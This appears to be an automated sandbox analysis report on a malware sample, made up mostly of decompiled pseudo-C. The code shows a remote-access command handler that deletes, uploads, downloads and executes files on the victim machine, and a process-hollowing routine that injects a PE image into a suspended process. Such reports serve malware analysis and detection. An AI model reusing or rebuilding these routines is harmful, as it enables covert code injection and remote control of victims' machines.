				SetEvent( *(_t573 + 0x24));
				_t574 =  *((intOrPtr*)(E00401F87( &_v184)));
				E00404287( &_v184,  &_v160, 4, 0xffffffff);
				_t598 = (_t595 & 0xfffffff8) - 0x104;
				E004020DE(_t356, _t598, _t549, _t643, 0x46e250);
				_t599 = _t598 - 0x18;
				E004020DE(_t356, _t599, _t549, _t643,  &_v176);
				E00417E68( &_v312, _t549);
				_t600 = _t599 + 0x30;
				_t644 = _t574 - 0x8b;
				if(_t644 > 0) {
					_t575 = _t574 - 0x8c;
					__eflags = _t575;
					if(__eflags == 0) {
						E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
						_t160 = GetFileAttributesW(E00401EDD( &_v284));
						__eflags = _t160 & 0x00000010;
						if((_t160 & 0x00000010) == 0) {
							_t162 = DeleteFileW(E00401EDD( &_v284));
						} else {
							_t162 = E00418144(E00401EDD( &_v284));
						}
						__eflags = _t162;
						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
						if(__eflags == 0) {
							_t601 = _t600 - 0x18;
							E00417D8C(_t356, _t601,  &_v276);
							_push(0x55);
							E00404BB7(_t356, 0x46e318,  &_v276, __eflags);
							_t166 = E00417D2B( &_v232,  &_v304);
							_t602 = _t601 - 0x18;
							_t552 = "Unable to delete: ";
							E004053F2(_t356, _t602, "Unable to delete: ", 0x46e250, __eflags, _t166);
							_t603 = _t602 - 0x14;
							_t376 = _t603;
							_push("E");
						} else {
							_t187 = E00417D2B( &_v204,  &_v276);
							_t607 = _t600 - 0x18;
							_t552 = "Deleted file: ";
							E004053F2(_t356, _t607, "Deleted file: ", 0x46e250, __eflags, _t187);
							_t603 = _t607 - 0x14;
							_t376 = _t603;
							_push("i");
						}
						E00402076(_t356, _t376);
						E00417670(_t356, 0x46e250);
						_t604 = _t603 + 0x30;
						E00401FB9();
						_t171 = E00401E3B( &_v312, _t552, __eflags, 1);
						_t549 = "1";
						_t379 = _t171;
						_t172 = E00405C1B("1");
						__eflags = _t172;
						if(_t172 == 0) {
							L40:
							E00401EE2();
							L41:
							E00401E66( &_v308, _t549);
							E00401FB9();
							E00401FB9();
							return 0;
						} else {
							__eflags = E00407486( &_v296, _t379, _t379) + 1;
							E004074A2(E00407486( &_v296, _t379, _t379) + 1);
							_t549 =  &_v308;
							E00401EEC( &_v308,  &_v308, _t575, E00402FEC(_t356,  &_v236,  &_v308, 0x2a));
							E00401EE2();
							E00404260(_t356, _t604 - 0x18, E00401EDD( &_v312));
							L39:
							E00406360();
							goto L40;
						}
					}
					_t577 = _t575 - 1;
					__eflags = _t577;
					if(__eflags == 0) {
						E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
						E00404260(_t356,  &_v240, E00401F87(E00401E3B( &_v296, _t549, __eflags, 1)));
						E0040746C( &_v300,  &_v276, 0, E00407486( &_v292,  &_v240,  &_v240) + 1);
						_t202 = E00401EDD(E00407749( &_v240,  &_v288,  &_v264));
						_t204 = E00437BC0(E00401EDD( &_v312), _t202);
						asm("sbb bl, bl");
						E00401EE2();
						_t360 =  ~_t204 + 1;
						__eflags =  ~_t204 + 1;
						if(__eflags == 0) {
							_t549 = E00405416( &_v204, "Unable to rename file!", __eflags, 0x46e250);
							E004076BB(_t360, _t600 - 0x18, _t206, 0x46e250, __eflags, "16");
							_push(0x59);
							E00404BB7(_t360, 0x46e318, _t206, __eflags);
							E00401FB9();
						} else {
							_t549 =  &_v252;
							E00407677(_t600 - 0x18,  &_v252, __eflags, "*");
							E00406360();
						}
						E00401EE2();
						L13:
						E00401EE2();
						goto L40;
					}
					_t580 = _t577 - 1;
					__eflags = _t580;
					if(__eflags == 0) {
						E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
						_t218 = E00401F87(E00401E3B( &_v296, _t549, __eflags, 1));
						_t549 =  &_v288;
						CreateDirectoryW(E00401EDD(E00407677( &_v216,  &_v288, __eflags, _t218)), 0);
						E00401EE2();
						E004032F2(0x2a);
						E004074B3(_t356, _t600 - 0x18,  &_v288, __eflags,  &_v292);
						goto L39;
					}
					_t582 = _t580 - 3;
					__eflags = _t580 - 3;
					if(__eflags == 0) {
						_t228 = StrToIntA(E00401F87(E00401E3B( &_v288, _t549, __eflags, _t582)));
						_t549 = E00401F87(E00401E3B( &_v292, _t549, __eflags, 1));
						E00418900(_t228, _t230);
					}
					goto L41;
				}
				if(_t644 == 0) {
					E004020C7(_t356,  &_v204);
					E004047EF(1);
					E004049DE( &_v136, _t574,  &_v132);
					_t235 = E00401E3B( &_v296, _t549, __eflags, 3);
					_t611 = _t600 - 0x18;
					_t236 = E00401E3B( &_v300, _t549, __eflags, 2);
					E00402F85(_t356, _t611, E00402F85(_t356,  &_v248, E00402F85(_t356,  &_v272, E00402FA9( &_v296, E00401E3B( &_v304, _t549, __eflags, 1), 0x46e250), __eflags, _t236), __eflags, 0x46e250), __eflags, _t235);
					E00404BB7(_t356,  &_v152, _t240, __eflags);
					E00401FB9();
					E00401FB9();
					E00401FB9();
					_t69 =  &_v336; // 0x56
					E00404260(_t356,  &_v304, E00401F87(E00401E3B(_t69, _t240, __eflags, 0)));
					_t249 = E00417D2B( &_v284,  &_v308);
					_t612 = _t611 - 0x18;
					E004053F2(_t356, _t612, "Downloading file: ", 0x46e250, __eflags, _t249);
					_t613 = _t612 - 0x14;
					E00402076(_t356, _t613, "i");
					E00417670(_t356, "i");
					E00401FB9();
					E00401EE2();
					_t256 = E00401F87(E00401E3B( &_v348, "Downloading file: ", __eflags, 0));
					_t615 = _t613 + 0x30 - 0x18;
					E00404260(_t356, _t615, _t256);
					_t261 = E00406475( &_v204, __eflags, E00437B10(_t258, E00401F87(E00401E3B( &_v356, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t617 = _t615 + 0x2c;
					_push(0);
					__eflags = _t261;
					if(__eflags == 0) {
						E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v360, "Downloading file: ", __eflags)));
						_t265 = E00417D2B( &_v256,  &_v280);
						_t549 = "Failed to download file: ";
						E004053F2(_t356, _t617 - 0x18, "Failed to download file: ", "i", __eflags, _t265);
						E00402076(_t356, _t617 - 4, "E");
						E00417670(_t356, "i");
						E00401FB9();
						E00401EE2();
					} else {
						E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v360, "Downloading file: ", __eflags)));
						_t277 = E00417D2B( &_v256,  &_v280);
						_t549 = "Downloaded file: ";
						E004053F2(_t356, _t617 - 0x18, "Downloaded file: ", "i", __eflags, _t277);
						E00402076(_t356, _t617 - 4, "i");
						E00417670(_t356, "i");
						E00401FB9();
						E00401EE2();
						E00402076(_t356, _t617 - 4 + 0x30 - 0x18, 0x460734);
						_push(0x58);
						E00404BB7(_t356,  &_v168, "Downloaded file: ", __eflags);
					}
					E00404F18( &_v152, _t549);
					E00404FD6(_t356,  &_v152, _t549, 0);
					L15:
					E00401FB9();
					goto L41;
				}
				_t586 = _t574 - 0x61;
				if(_t586 == 0) {
					E00404260(_t356, _t600 - 0x18, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
					_t288 = E00401E3B( &_v296, _t549, __eflags, 2);
					_t289 = E00401E3B( &_v300, _t549, __eflags, 1);
					_t549 = _t288;
					E00417382(_t289, _t288);
					goto L41;
				}
				_t588 = _t586 - 0x26;
				if(_t588 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v132);
					E0040209D(_t356,  &_v276, _t549, __eflags,  &_v132, 0x64);
					__eflags = E004074FA( &_v284, 0x4608d0, 0, 2) + 1;
					E00401F76(E004074FA( &_v284, 0x4608d0, 0, 2) + 1);
					E004020DE(_t356, _t600 - 0x18, _t549, E004074FA( &_v284, 0x4608d0, 0, 2) + 1,  &_v300);
					_t300 = E004065A3(_t356,  &_v280);
					_t549 = E00402FA9( &_v256,  &_v304, 0x46e250);
					E00402F0F(_t600 - 0x18, _t301, _t300);
					_push(0x51);
					E00404BB7(_t356, 0x46e318, _t301, __eflags);
					E00401FB9();
					E00401FB9();
					goto L15;
				}
				_t590 = _t588 - 1;
				if(_t590 == 0) {
					E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
					E004074B3(_t356, _t600 - 0x18, _t549, __eflags,  &_v284);
					E00406360();
					__eflags = E0040247B() - 2;
					_t316 = E00417D2B( &_v252, E0040746C( &_v288,  &_v264, 0, E0040247B() - 2));
					_t549 = "Browsing directory: ";
					E004053F2(_t356, _t600 - 0x18 + 0x18 - 0x18, "Browsing directory: ", 0x46e250, E0040247B() - 2, _t316);
					E00402076(_t356, _t600 - 0x18 + 0x18 - 4, "i");
					E00417670(_t356, 0x46e250);
					E00401FB9();
					goto L13;
				}
				_t592 = _t590 - 1;
				if(_t592 == 0) {
					E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
					ShellExecuteW(0, L"open", E00401EDD( &_v284), 0, 0, 1);
					_t326 = E00417D2B( &_v236,  &_v284);
					_t549 = "Executing file: ";
					E004053F2(_t356, _t600 - 0x18, "Executing file: ", 0x46e250, __eflags, _t326);
					E00402076(_t356, _t600 - 4, "i");
					E00417670(_t356, 0x46e250);
					E00401FB9();
					goto L40;
				} else {
					_t594 = _t592 - 1;
					_t649 = _t594;
					if(_t594 == 0) {
						E00407456( &_v132);
						_t332 = E00401E3B( &_v288, _t549, _t649, 3);
						_t636 = _t600 - 0x18;
						E004020DE(_t356, _t636, _t549, _t649, _t332);
						_t334 = E00401E3B( &_v296, _t549, _t649, 2);
						_t637 = _t636 - 0x18;
						E004020DE(_t356, _t637, _t549, _t649, _t334);
						_t336 = E00401E3B( &_v304, _t549, _t649, 1);
						_t638 = _t637 - 0x18;
						E004020DE(_t356, _t638, _t549, _t649, _t336);
						_push(E00401F87(E00401E3B( &_v312, _t549, _t649, _t594)));
						_t340 = E0040663F( &_v160, _t549, _t649);
						_push(_t594);
						_t650 = _t340;
						if(_t340 == 0) {
							E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v392, _t549, __eflags)));
							_t344 = E00417D2B( &_v256,  &_v280);
							_t639 = _t638 - 0x18;
							_t549 = "Failed to upload file: ";
							E004053F2(_t356, _t639, "Failed to upload file: ", 0x46e250, __eflags, _t344);
							_t541 = _t639 - 0x14;
							_push("E");
						} else {
							E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v392, _t549, _t650)));
							_t354 = E00417D2B( &_v256,  &_v280);
							_t642 = _t638 - 0x18;
							_t549 = "Uploaded file: ";
							E004053F2(_t356, _t642, "Uploaded file: ", 0x46e250, _t650, _t354);
							_t541 = _t642 - 0x14;
							_push("i");
						}
						E00402076(_t356, _t541);
						E00417670(_t356, 0x46e250);
						E00401FB9();
						E00401EE2();
						E00407464();
					}
					goto L41;
				}
			}













































































































                                                                                                0x00406aee
                                                                                                0x00406aee
                                                                                                0x00406afe
                                                                                                0x00406b00
                                                                                                0x00406b08
                                                                                                0x00406b10
                                                                                                0x00406b2a
                                                                                                0x00406b34
                                                                                                0x00406b39
                                                                                                0x00406b44
                                                                                                0x00406b49
                                                                                                0x00406b56
                                                                                                0x00406b5f
                                                                                                0x00406b69
                                                                                                0x00406b6c
                                                                                                0x00406b6e
                                                                                                0x00407111
                                                                                                0x00407111
                                                                                                0x00407117
                                                                                                0x004072f8
                                                                                                0x00407307
                                                                                                0x00407311
                                                                                                0x00407313
                                                                                                0x00407329
                                                                                                0x00407315
                                                                                                0x0040731c
                                                                                                0x0040731c
                                                                                                0x0040732f
                                                                                                0x00407338
                                                                                                0x0040733a
                                                                                                0x00407361
                                                                                                0x00407366
                                                                                                0x0040736b
                                                                                                0x00407372
                                                                                                0x0040737f
                                                                                                0x00407384
                                                                                                0x00407387
                                                                                                0x0040738f
                                                                                                0x00407394
                                                                                                0x00407397
                                                                                                0x00407399
                                                                                                0x0040733c
                                                                                                0x00407340
                                                                                                0x00407345
                                                                                                0x00407348
                                                                                                0x00407350
                                                                                                0x00407355
                                                                                                0x00407358
                                                                                                0x0040735a
                                                                                                0x0040735a
                                                                                                0x0040739e
                                                                                                0x004073a3
                                                                                                0x004073a8
                                                                                                0x004073af
                                                                                                0x004073ba
                                                                                                0x004073bf
                                                                                                0x004073c4
                                                                                                0x004073c6
                                                                                                0x004073cb
                                                                                                0x004073cd
                                                                                                0x00407424
                                                                                                0x00407428
                                                                                                0x0040742d
                                                                                                0x00407431
                                                                                                0x0040743d
                                                                                                0x00407446
                                                                                                0x00407453
                                                                                                0x004073cf
                                                                                                0x004073da
                                                                                                0x004073e0
                                                                                                0x004073e7
                                                                                                0x004073fa
                                                                                                0x00407403
                                                                                                0x00407417
                                                                                                0x0040741c
                                                                                                0x0040741c
                                                                                                0x00000000
                                                                                                0x00407421
                                                                                                0x004073cd
                                                                                                0x0040711d
                                                                                                0x0040711d
                                                                                                0x00407120
                                                                                                0x004071fb
                                                                                                0x00407217
                                                                                                0x00407233
                                                                                                0x0040724d
                                                                                                0x0040725d
                                                                                                0x0040726c
                                                                                                0x0040726e
                                                                                                0x00407273
                                                                                                0x00407273
                                                                                                0x00407276
                                                                                                0x004072b0
                                                                                                0x004072b4
                                                                                                0x004072ba
                                                                                                0x004072c1
                                                                                                0x004072ca
                                                                                                0x00407278
                                                                                                0x0040727b
                                                                                                0x00407286
                                                                                                0x0040728c
                                                                                                0x00407291
                                                                                                0x004072d3
                                                                                                0x00406dd0
                                                                                                0x00406dd0
                                                                                                0x00000000
                                                                                                0x00406dd0
                                                                                                0x00407126
                                                                                                0x00407126
                                                                                                0x00407129
                                                                                                0x00407186
                                                                                                0x00407199
                                                                                                0x0040719f
                                                                                                0x004071b5
                                                                                                0x004071bf
                                                                                                0x004071ca
                                                                                                0x004071d9
                                                                                                0x00000000
                                                                                                0x004071d9
                                                                                                0x0040712b
                                                                                                0x0040712b
                                                                                                0x0040712e
                                                                                                0x00407146
                                                                                                0x00407160
                                                                                                0x00407164
                                                                                                0x00407164
                                                                                                0x00000000
                                                                                                0x0040712e
                                                                                                0x00406b74
                                                                                                0x00406ec4
                                                                                                0x00406ed2
                                                                                                0x00406edf
                                                                                                0x00406eea
                                                                                                0x00406eef
                                                                                                0x00406efc
                                                                                                0x00406f36
                                                                                                0x00406f45
                                                                                                0x00406f4e
                                                                                                0x00406f57
                                                                                                0x00406f60
                                                                                                0x00406f67
                                                                                                0x00406f7d
                                                                                                0x00406f8a
                                                                                                0x00406f8f
                                                                                                0x00406f9a
                                                                                                0x00406f9f
                                                                                                0x00406faa
                                                                                                0x00406faf
                                                                                                0x00406fbb
                                                                                                0x00406fc4
                                                                                                0x00406fd5
                                                                                                0x00406fda
                                                                                                0x00406fe0
                                                                                                0x0040700c
                                                                                                0x00407011
                                                                                                0x00407018
                                                                                                0x00407019
                                                                                                0x0040701b
                                                                                                0x004070a5
                                                                                                0x004070b2
                                                                                                0x004070ba
                                                                                                0x004070c2
                                                                                                0x004070d1
                                                                                                0x004070d6
                                                                                                0x004070e2
                                                                                                0x004070eb
                                                                                                0x0040701d
                                                                                                0x0040702e
                                                                                                0x0040703b
                                                                                                0x00407043
                                                                                                0x0040704b
                                                                                                0x00407056
                                                                                                0x0040705b
                                                                                                0x00407067
                                                                                                0x00407070
                                                                                                0x0040707f
                                                                                                0x00407084
                                                                                                0x0040708d
                                                                                                0x0040708d
                                                                                                0x004070f7
                                                                                                0x00407103
                                                                                                0x00406e70
                                                                                                0x00406e70
                                                                                                0x00000000
                                                                                                0x00406e70
                                                                                                0x00406b7a
                                                                                                0x00406b7d
                                                                                                0x00406e92
                                                                                                0x00406e9d
                                                                                                0x00406eaa
                                                                                                0x00406eaf
                                                                                                0x00406eb3
                                                                                                0x00000000
                                                                                                0x00406eb8
                                                                                                0x00406b83
                                                                                                0x00406b86
                                                                                                0x00406de4
                                                                                                0x00406df8
                                                                                                0x00406e0f
                                                                                                0x00406e15
                                                                                                0x00406e24
                                                                                                0x00406e2d
                                                                                                0x00406e44
                                                                                                0x00406e48
                                                                                                0x00406e4e
                                                                                                0x00406e55
                                                                                                0x00406e5e
                                                                                                0x00406e67
                                                                                                0x00000000
                                                                                                0x00406e6c
                                                                                                0x00406b8c
                                                                                                0x00406b8f
                                                                                                0x00406d59
                                                                                                0x00406d68
                                                                                                0x00406d6d
                                                                                                0x00406d7e
                                                                                                0x00406d97
                                                                                                0x00406d9f
                                                                                                0x00406da7
                                                                                                0x00406db6
                                                                                                0x00406dbb
                                                                                                0x00406dc7
                                                                                                0x00000000
                                                                                                0x00406dcc
                                                                                                0x00406b95
                                                                                                0x00406b98
                                                                                                0x00406ce0
                                                                                                0x00406cf9
                                                                                                0x00406d07
                                                                                                0x00406d0f
                                                                                                0x00406d17
                                                                                                0x00406d26
                                                                                                0x00406d2b
                                                                                                0x00406d37
                                                                                                0x00000000
                                                                                                0x00406b9e
                                                                                                0x00406b9e
                                                                                                0x00406b9e
                                                                                                0x00406ba1
                                                                                                0x00406bae
                                                                                                0x00406bb9
                                                                                                0x00406bbe
                                                                                                0x00406bc4
                                                                                                0x00406bcf
                                                                                                0x00406bd4
                                                                                                0x00406bda
                                                                                                0x00406be5
                                                                                                0x00406bea
                                                                                                0x00406bf0
                                                                                                0x00406c06
                                                                                                0x00406c0e
                                                                                                0x00406c17
                                                                                                0x00406c18
                                                                                                0x00406c1a
                                                                                                0x00406c6c
                                                                                                0x00406c79
                                                                                                0x00406c7e
                                                                                                0x00406c81
                                                                                                0x00406c89
                                                                                                0x00406c91
                                                                                                0x00406c93
                                                                                                0x00406c1c
                                                                                                0x00406c2d
                                                                                                0x00406c3a
                                                                                                0x00406c3f
                                                                                                0x00406c42
                                                                                                0x00406c4a
                                                                                                0x00406c52
                                                                                                0x00406c54
                                                                                                0x00406c54
                                                                                                0x00406c98
                                                                                                0x00406c9d
                                                                                                0x00406ca9
                                                                                                0x00406cb2
                                                                                                0x00406cbe
                                                                                                0x00406cbe
                                                                                                0x00000000
                                                                                                0x00406ba1

                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00406B10
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406CF9
                                                                                                  • Part of subcall function 0040663F: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040667C
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 00406DE4
                                                                                                • StrToIntA.SHLWAPI(00000000,?), ref: 00407146
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 004071B5
                                                                                                  • Part of subcall function 00406360: FindFirstFileW.KERNEL32(00000000,?), ref: 0040637B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile$DirectoryDriveEventExecuteFindFirstLocalLogicalShellStringsTimechar_traitssend
                                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $PF$Unable to delete: $Unable to rename file!$Uploaded file: $VPF$open
                                                                                                • API String ID: 250922350-1502489740
                                                                                                • Opcode ID: f22b2b76d64d057f2749c1991440be0bd0246d7df056fd89cd72aaaa9fd807df
                                                                                                • Instruction ID: 51d4d6a48ea50cd7a2bdc639e76df59bb0010e2f68b5afca2e8c2586ef65caae
                                                                                                • Opcode Fuzzy Hash: f22b2b76d64d057f2749c1991440be0bd0246d7df056fd89cd72aaaa9fd807df
                                                                                                • Instruction Fuzzy Hash: CF2282716083015BC608F776C857DAF77A9AF91348F40093EF943671E2EE789A09C69B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00414B29, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E00414B29(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void* _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						E00432D80(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdd03
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdd03
							CloseHandle( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								NtUnmapViewOfSection(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdd03
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdd03
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t37 =  &_v16; // 0x414d39
									_t102 = _v12 + 1;
									_t104 =  *_t37 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}























                                                                                                0x00414b2f
                                                                                                0x00414b38
                                                                                                0x00414b3b
                                                                                                0x00414b41
                                                                                                0x00414b4e
                                                                                                0x00414b56
                                                                                                0x00414b60
                                                                                                0x00414b69
                                                                                                0x00414b6e
                                                                                                0x00414b78
                                                                                                0x00414b7a
                                                                                                0x00414b7b
                                                                                                0x00414b7c
                                                                                                0x00414b96
                                                                                                0x00414d20
                                                                                                0x00414d20
                                                                                                0x00414d22
                                                                                                0x00414d24
                                                                                                0x00000000
                                                                                                0x00414d24
                                                                                                0x00414ba5
                                                                                                0x00414baa
                                                                                                0x00414baf
                                                                                                0x00414bc2
                                                                                                0x00414bc5
                                                                                                0x00414bc8
                                                                                                0x00414bce
                                                                                                0x00414bd9
                                                                                                0x00414cff
                                                                                                0x00414d03
                                                                                                0x00414d11
                                                                                                0x00414d13
                                                                                                0x00414d16
                                                                                                0x00414d1c
                                                                                                0x00414d1d
                                                                                                0x00414d1e
                                                                                                0x00414d1f
                                                                                                0x00000000
                                                                                                0x00414c01
                                                                                                0x00414c01
                                                                                                0x00414c07
                                                                                                0x00414c0c
                                                                                                0x00414c0c
                                                                                                0x00414c21
                                                                                                0x00414c27
                                                                                                0x00414c2c
                                                                                                0x00000000
                                                                                                0x00414c32
                                                                                                0x00414c32
                                                                                                0x00414c46
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00414c4c
                                                                                                0x00414c56
                                                                                                0x00414ca0
                                                                                                0x00414ca3
                                                                                                0x00414ca6
                                                                                                0x00414cab
                                                                                                0x00414cd3
                                                                                                0x00414cda
                                                                                                0x00414ce0
                                                                                                0x00414ceb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00414ced
                                                                                                0x00414cf9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00414cfb
                                                                                                0x00000000
                                                                                                0x00414cfb
                                                                                                0x00414cbe
                                                                                                0x00414cc6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00414ccb
                                                                                                0x00000000
                                                                                                0x00414ccb
                                                                                                0x00414c58
                                                                                                0x00414c5a
                                                                                                0x00414c5d
                                                                                                0x00414c5d
                                                                                                0x00414c82
                                                                                                0x00414c8b
                                                                                                0x00414c8e
                                                                                                0x00414c93
                                                                                                0x00414c96
                                                                                                0x00414c99
                                                                                                0x00414c9c
                                                                                                0x00000000
                                                                                                0x00414c5d
                                                                                                0x00414c2c
                                                                                                0x00414bd9
                                                                                                0x00414b58
                                                                                                0x00000000
                                                                                                0x00414b58
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 9MA
                                                                                                • API String ID: 0-2432124739
                                                                                                • Opcode ID: ab9735e6901d4979b8adc38f45d8b4ae0f4aafad0fef2e90a1dcfdb6a44d71b9
                                                                                                • Instruction ID: be3675743dd1187929dd058ad4bef95e5a30998592e5cbd9f41aad8c7f2322ed
                                                                                                • Opcode Fuzzy Hash: ab9735e6901d4979b8adc38f45d8b4ae0f4aafad0fef2e90a1dcfdb6a44d71b9
                                                                                                • Instruction Fuzzy Hash: 3451DF70600605FFEB109FA5DC44FAABBB9FF88305F104025FA45EA2A1D775D891DBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004057A3, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 275pipesleepfileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E004057A3(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t56;
				void* _t60;
				void* _t68;
				void* _t69;
				void* _t73;
				void* _t82;
				CHAR* _t83;
				int _t85;
				int _t101;
				intOrPtr* _t111;
				intOrPtr _t142;
				signed int _t146;
				signed int _t147;
				long _t152;
				void* _t155;
				intOrPtr* _t156;
				void* _t162;
				void* _t167;
				void* _t174;

				_t156 = _t155 - 0x44;
				_push(_t146);
				_t142 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t101 = 0;
				if( *0x46fe78 >  *((intOrPtr*)(_t142 + 4))) {
					E0042FE69(0x46fe78);
					_t159 =  *0x46fe78 - _t147;
					if( *0x46fe78 == _t147) {
						E004047EF(0);
						E004301F3(_t159, E00453956);
						 *_t156 = 0x46fe78;
						E0042FE2A(_t147);
					}
				}
				if( *0x46fe58 >  *((intOrPtr*)(_t142 + 4))) {
					E0042FE69(0x46fe58);
					_t161 =  *0x46fe58 - _t147;
					if( *0x46fe58 == _t147) {
						E004020C7(_t101, 0x46fe80);
						E004301F3(_t161, E0045394C);
						E0042FE2A(_t147, 0x46fe58);
					}
				}
				_t103 =  &_v44;
				E004020C7(_t101,  &_v44);
				_t143 = CloseHandle;
				_v8 = _t101;
